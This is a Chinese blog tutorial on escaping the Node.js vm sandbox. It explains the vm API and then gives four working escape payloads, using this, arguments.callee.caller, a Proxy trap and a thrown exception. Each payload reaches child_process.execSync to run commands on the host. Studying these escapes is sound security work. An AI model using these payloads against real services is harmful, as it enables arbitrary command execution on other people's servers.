nodejs沙箱绕过

最新推荐文章于 2023-10-22 12:39:26 发布
最新推荐文章于 2023-10-22 12:39:26 发布
阅读量362 收藏
点赞数
文章标签: 沙箱 vm 网络安全 JavaScript node.js
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jill1179457809/article/details/132125584
版权

目录

沙箱绕过原理

VM模块

1.vm.createContext([sandbox])

2.vm.runInContext

3.vm.runInNewContext

4.vm.Script类 

5.new vm.Script(code, options)

绕过方法

1.通过this

2.在没有this的情况下采用arguments对象

3.使用Proxy来劫持所有属性

4..借助异常

沙箱绕过原理

沙箱绕过的核心原理:只要我们能在沙箱内部,找到一个沙箱外部的对象,借助这个对象内的属性即可获得沙箱外的函数,进而绕过沙箱

VM模块

vm模块是Node.JS内置的一个模块。

理论上不能叫沙箱,他只是Node.JS提供给使用者的一个隔离环境。

简单介绍一下vm模块的用法

1.vm.createContext([sandbox])

在使用前需要先创建一个沙箱对象,再将沙箱对象传给该方法(如果没有则会生成一个空的沙箱对象),v8为这个沙箱对象在当前global外再创建一个作用域,此时这个沙箱对象就是这个作用域的全局对象,沙箱内部无法访问global中的属性。

2.vm.runInContext

vm.runInContext(code, contextifiedSandbox[, options])

参数为要执行的代码和创建完作用域的沙箱对象,代码会在传入的沙箱对象的上下文中执行,并且参数的值与沙箱内的参数值相同

再多提一点别的

3.vm.runInNewContext

vm.runInNewContext(code[, sandbox][, options])

creatContext和runInContext的结合版,传入要执行的代码和沙箱对象。

4.vm.Script类 

vm.Script类型的实例包含若干预编译的脚本,这些脚本能够在特定的沙箱(或者上下文)中被运行。

5.new vm.Script(code, options)

创建一个新的vm.Script对象只编译代码但不会执行它。编译过的vm.Script此后可以被多次执行。值得注意的是,code是不绑定于任何全局对象的,相反,它仅仅绑定于每次执行它的对象。

code:要被解析的JavaScript代码

举一个常用的例子

const vm = require('vm');  //引入vm模块
const script = `m + n`;
const sandbox = { m: 1, n: 2 };
const context = new vm.createContext(sandbox); //创建沙箱对象
const res = vm.runInContext(script, context);//指定要执行的代码块和指定的沙箱
console.log(res)

绕过方法

1.通过this

我们可以使用外部传入的对象,比如this来引入当前上下文里没有的模块,进而绕过这个隔离环境

this.toString.constructor('return process')()
 

const process = this.toString.constructor('return process')() 
process.mainModule.require('child_process').execSync('whoami').toString()

第一行的 this.toString 获得函数对象,this.toString.constructor获得函数对象的构造器Function ,Function中可以传入字符串类 "return process" 来获得process对象

第二行 利用process对象执行想要执行的代码whoami

这里有一个值得注意的地方

为什么我们不直接使用{}.toString.constructor('return process')(),却要使用this呢?

这两个的一个重要区别就是,{}是在沙盒内的一个对象,而this是在沙盒外的对象(注入进来的)。沙盒内的对象即使使用这个方法,也获取不到process,因为它本身就没有process。

那么另一个问题,m和n也是沙盒外的对象,为什么也不能用m.toString.constructor('return process')()呢?

这个原因就是因为primitive types,数字、字符串、布尔等这些都是primitive types,他们的传递其实传递的是值而不是引用,所以在沙盒内虽然你也是使用的m,但是这个m和外部那个m已经不是一个m了,所以也是无法利用的

所以,如果修改下context:{m: [], n: {}, x: /regexp/},这样m、n、x就都可以利用了。

2.在没有this的情况下采用arguments对象

const vm = require('vm'); 
const script = `...`; 
const sandbox = Object.create(null); //指向null啦
const context = new vm.createContext(sandbox); 
const res = vm.runInContext(script, context); 
console.log('Hello ' + res)

采用arguments对象

arguments.callee.caller获得调用这个函数的调用者。 arguments.callee,指向函数本身,arguments.caller指向函数的父类,调用者调用该函数者,类似于this

(() => {  

const a = {}  

a.toString = function () {    

const cc = arguments.callee.caller;    

const p = (cc.constructor.constructor('return process'))();   

return p.mainModule.require('child_process').execSync('whoami').toString()  

}  

return a })()

①a 是空对象,也是箭头函数最后要返回的对象

②a.toString修改了toString方法返回使用process子模块执行任意代码,且只对a对象起作用,

③cc 获取的就是 process对象

④res = vm.runInContext(script, context); res成为执行script代码后的新的对象script代码块最终返回a对象,所以其实就是a

⑤.console.log('Hello ' + res) 字符串拼接对象,自动调用a对象里的toString方法,执行我们想要的代码

3.使用Proxy来劫持所有属性

只要沙箱外获取了属性,我们仍然可以用来执行恶意代码

(() => {  

const a = new Proxy({}, { 

get: function() {      

const cc = arguments.callee.caller;      

const p = (cc.constructor.constructor('return process'))();     

 return p.mainModule.require('child_process').execSync('whoami').toString()

}  

})    

return a })()
//使用proxy代理操作拦截对象属性的读取,当读取数据的时候就触发proxy

4..借助异常

将沙箱内的对象抛出去,如果外部有捕捉异常的(如日志)逻辑,则也可能触发漏洞

具体的代码

vm = require('vm'); 

const code5 = `throw new Proxy({}, {    
 get: function() {     
 const cc = arguments.callee.caller;      
 const p = (cc.constructor.constructor('return process'))();      
 return p.mainModule.require('child_process').execSync('whoami').toString()    
 }  
 }) `; 
try {    vm.runInContext(code5, vm.createContext(Object.create(null))); }
 catch(e)
 {    console.log('error happend: ' + e); }

胖虎瓶大剑
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
nodejs-沙箱
03-04
参考: : Nodejs沙箱安装打开cmd并输入'node -v'来检查您的计算机是否安装了nodejs。 如果不是,请在这里下载并安装Node js。运行节点程序转到您的项目目录,并在cmd中写入节点{ur_js_fileName}创建服务器并侦听请求...
Noder-简单的基于Docker的NodeJS沙箱
08-10
Noder -简单的,基于Docker的NodeJS沙箱。用于测试代码并包含一个编辑器
NodeJs中的VM模块详解(摘)
fengdijiang的专栏
03-20 4912
更新时间:2015年05月06日 10:21:50 投稿:junjie 我要评论 这篇文章主要介绍了NodeJs中的VM模块详解,本文讲解了什么是VM? 、VM模块的runInThisContextrunInThisContext方法等内容,需要的朋友可以参考下 什么是VMVM模块是NodeJS里面的核心模块,支撑了require方法和NodeJS的运...
Node.js VM模块
司马懿的西山居
09-29 7274
vm模块在V8虚拟机上下文中提供了编译和运行代码的API
JavaScript
FXLZZZZZZ的博客
07-08 206
内容索引: 5.4. JavaScript 5.4.1. ECMAScript 5.4.1.1. 简介 5.4.1.2. 版本 5.4.1.3. ES6 特性 5.4.2. 引擎 5.4.2.1. V8 5.4.2.2. SpiderMonkey 5.4.2.3. JavaScriptCore 5.4.2.4. ChakraCore 5.4.2.5. JScript 5.4.2.6. JerryScript 5.4.3. WebAssembly 5.4.3.1. 简介 5.4.3.2. 执行 5.4.3.3
node的vm(虚拟机),改变运行的环境
longtengg1的博客
05-08 1207
vm文档 node文档中对vm的解释是: vm 模块提供了一系列 API 用于在 V8 虚拟机环境中编译和运行代码。 JavaScript 代码可以被编译并立即运行,也可以编译、保存然后再运行。 同时node文档中提醒: vm模块并不是实现代码安全性的一套机制。 绝不要试图用其运行未经信任的代码. vm模块允许改变一些JavaScript脚本代码的上下文运行环境。但是这些代码仍然是运行在nodejs应用程序的当前进程中。从这个角度来说,vm的功能有些类似于eval函数,但是vm模块提供了一些eval函数所不
动态执行javascript代码的几种方法介绍
weixin_34389926的博客
04-02 822
为什么80%的码农都做不了架构师?>>> ...
cloudflare-bypass:NodeJS工具绕过Cloudflare iUam V2
04-28
绕云绕道 一个NodeJS工具绕过Cloudflare IUAM v2。这个怎么运作JS挑战( jsch )包含多个串联JavaScript挑战。 我正在尝试对所有这些进行逆向工程,在可以看到已经逆转的所有挑战。 验证码挑战可以在JS挑战之后提出...
sandbox:用于随机事物的 NodeJS 沙箱
06-29
在这个场景下,"sandbox:用于随机事物的 NodeJS 沙箱" 可能是指一个项目,这个项目创建了一个 Node.js沙箱环境,用于测试、实验或处理不确定来源的 JavaScript 代码。 首先,我们来深入了解一下 Node.js沙箱...
Address-Book-API:托管示例地址簿 RESTful API 的 NodeJS 沙箱存储库
06-21
地址簿API 使用准系统 Node.js 应用程序。 此应用程序扩展了如文章中所述 - 请查看。 在本地运行 确保你已经安装了和 。 ...$ cd address-book-api $ npm install ... 您的应用程序现在应该在上运行。...
NodeJS vm&vm2沙箱逃逸
leekos的博客,分享web安全相关知识~
08-05 1381
在讲沙箱逃逸之前,我们需要了解一下什么是沙箱沙箱就是一个集装箱,把你的应用装到沙箱里去运行,这样应用与应用之间就产生了边界,不会相互影响。当我们运行一些可能产生危害的程序时,我们不能直接在主机上运行。我们可以单独开辟一个运行代码的环境,这个环境就是沙箱,它与主机相互隔离,但使用主机的资源,但有危害的代码在沙箱内运行只会对沙箱内部产生一些影响,不影响主机的功能。
浅谈NPM,vm,vm2,Node.js沙盒逃逸
m0_62063669的博客
06-24 3068
浅谈NPM,vm,vm2,Node.js沙盒逃逸( npm是用 JavaScript 写的,运行在 Node.js 上,Node.js 内置了 npm,npm 的发展是跟 Node.js 的发展相辅相成的。)简单来说, Node.js 就是运行在服务端的JavaScript,npm是随同Node.js一起安装的包管理工具,通过命令从npm服务器下载别人编写的第三方工具到本地使用。但是VM不安全,能轻易地获取到了主程序的全局对象 process,最终控制主程序!因此VM2诞生,解决了VM的安全问题。 ..
NodeJS VM沙箱逃逸
最新发布
rev1ve的博客
10-22 582
什么是沙箱(sandbox)当我们运行一些可能会产生危害的程序,我们不能直接在主机的真实环境上进行测试,所以可以通过单独开辟一个运行代码的环境,它与主机相互隔离,但使用主机的硬件资源,我们将有危害的代码在沙箱中运行只会对沙箱内部产生一些影响,而不会影响到主机上的功能,沙箱的工作机制主要是依靠重定向,将恶意代码的执行目标重定向到沙箱内部。我们都知道函数内和函数外是两个作用域,不过当在函数中的作用域想要使用函数外的变量时,要通过形参来传递,当参数过多时这种方法就变的麻烦起来了。
node.js--vm沙箱逃逸初探
m0_62422842的博客
01-04 2054
前几天遇到一个考察vm沙箱逃逸的题目,由于这个点是第一次听说,所以就花时间了解了解什么是沙箱逃逸。此篇文章是对于自己初学vm沙箱逃逸的学习记录,若记录知识有误,欢迎师傅们指正。就只针对于node.js而言,沙箱和docker容器其实是差不多的,都是将程序与程序之间,程序与主机之间互相分隔开,但是沙箱是为了隔离有害程序的,避免影响到主机环境。为什么node.js语言要引入沙箱,这就要说说js语言中的作用域(也叫上下文)。------->输出undefined-------->输出100。
nodejs--vm模块
小白小白从不日别的博客
11-24 982
a.runInThisContext runInThisContext:提供了一个安全的环境给我们执行字符串中的代码 runInThisContext提供的环境不能访问本地的变量,但是可以访问全局的变量(也就是global上的变量) let vm = require("vm"); let name = "lwj"; let str = "console.log(name);"; vm.runInThisContext(str); // name is not defined let...
node基础1runInThisContext == eval
gwdgwd123的博客
06-23 999
let path = require('path') path.resolve(__dirname,'./1.start.js') // 把路径转化成绝对路径 当前文件夹 path.join(__dirname,'./1.start.js') path.resolve(__dirname,'./1.start.js','/') 回到磁盘根 path.join(__dirname,'./1....
使用 vm 加载文件中的数据到变量里面
weixin_34026276的博客
04-11 336
.json 不能写注释, 还需要严格的双引号 或者使用 .json5 // test.db [ // name {name: 1} ] // test.js const fs = require('fs'); const vm = require('vm'); const util = require('util') const format = console.log; const...
nodejs沙箱逃逸
09-11
具体来说,沙箱逃逸利用的是node.js中的漏洞或不当的配置,使攻击者能够绕过沙箱的限制,执行恶意代码或访问敏感资源。攻击者可能通过构造精心设计的输入,触发沙箱漏洞,从而获得对主机环境的不受限制的访问权限。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值